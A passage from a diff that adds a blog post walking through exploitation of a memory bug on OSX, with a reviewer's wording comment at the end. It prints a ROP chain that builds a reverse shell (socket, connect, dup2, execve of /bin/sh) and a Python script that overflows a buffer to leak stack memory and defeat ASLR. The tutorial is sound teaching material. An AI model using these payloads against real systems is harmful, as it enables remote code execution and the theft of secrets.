content/post/walkthrough-exploiting-bugs-to-gain-code-execution.md

```diff
@@ -0,0 +1,338 @@
+
+```
+0x0000000000011404 : syscall ; ret
+```
+
+Also of particular interest are the especially versatile gadgets that just pop values off of the stack into registers. I recommend using the C++ pre-processor to define some basic building blocks with them like so:
+
+```
+#define LOAD_RDI(n) \
+    KERNEL_GADGET(0x0000000000000b25), n, 0 // pop rdi ; pop rbp ; ret
+
+#define LOAD_RDX(n) \
+    KERNEL_GADGET(0x0000000000014762), n // pop rdx ; ret
+
+#define SYSCALL(n) \
+    LOAD_RAX(n), \
+    KERNEL_GADGET(0x0000000000011404) // syscall ; ret
+```
+
+That way, the end result is something that's no less readable than your original assembly:
+
+```
+// socket(AF_INET, SOCK_STREAM, 0)
+LOAD_RDI(2),
+LOAD_RSI(1),
+LOAD_RDX(0),
+SYSCALL(0x2000061),
+
+// connect(s, &address, 16)
+GET_POINTER(0x0100007fb80b0200, 0, 0, 0, 0),
+MOVE_RAX_TO_RDI(),
+LOAD_RDX(16),
+SYSCALL(0x2000062),
+
+// dup2(s, 0)
+LOAD_RSI(0),
+SYSCALL(0x200005a),
+
+// dup2(s, 1)
+LOAD_RSI(1),
+SYSCALL(0x200005a),
+
+// dup2(s, 2)
+LOAD_RSI(2),
+SYSCALL(0x200005a),
+
+// execve("/bin/sh", 0, 0)
+GET_POINTER(0x0068732f6e69622f, 0, 0, 0, 0),
+MOVE_RSI_TO_RDI(),
+LOAD_RSI(0),
+LOAD_RDX(0),
+SYSCALL(0x200003b),
+```
+
+You can find my ROP code for OSX [here](https://gist.github.com/ccbrown/cd7c8f5dccbd5699fe43). As you can see, if you plug in a library address, you can easily run and step through your chain in the debugger.
+
+The pwning
+----------
+
+Now we're ready to complete the pwning. We can write to arbitrary memory, and we have a payload that'll give us a shell if we plug in a library address and write the payload to the stack.
+
+There's just one more hurdle... [ASLR](https://en.wikipedia.org/wiki/Address_space_layout_randomization). On OSX, the libraries are randomly placed into memory on boot. They slide around, but they're always the same relative to eachother, so if we have the address of one, we have the address for them all. There are a few platform-specific ways to defeat ASLR, but in this case, we can actually get the program itself to tell us what we need to know.
+
+By overwriting the offset, we can get the program to dump its memory for us:
+
+```
+#!/usr/bin/env python
+
+import socket, struct, time
+
+s = socket.create_connection(('127.0.0.1', 2000))
+s.send('x' * 512) # fill _recvBuffer
+s.send('y' * 4)   # fill _recvOffset alignment padding
+s.send(struct.pack('<Q', 0x300)) # fill _recvBytes
+time.sleep(1) # send the newline after _recvOffset has been overwritten
+s.send('\n')
+print(s.recv(4096).encode('hex'))
+```
+
+This happens to be stack memory, so if we were to dump more, we could actually get a lot of interesting information including environment variables. That alone can be really valuable since a lot of people carry the bad habit of putting sensitive information in environment variables, but what we want to get out of this is the offset of the libraries. Just look through the dump for a pointer to anything in one of those libraries.
```

Comment:
>That, alone, can be

I don't think you need to correct this, but I think shortening the second sentence by removing "out of this":

>but what we really want is the offset of the libraries.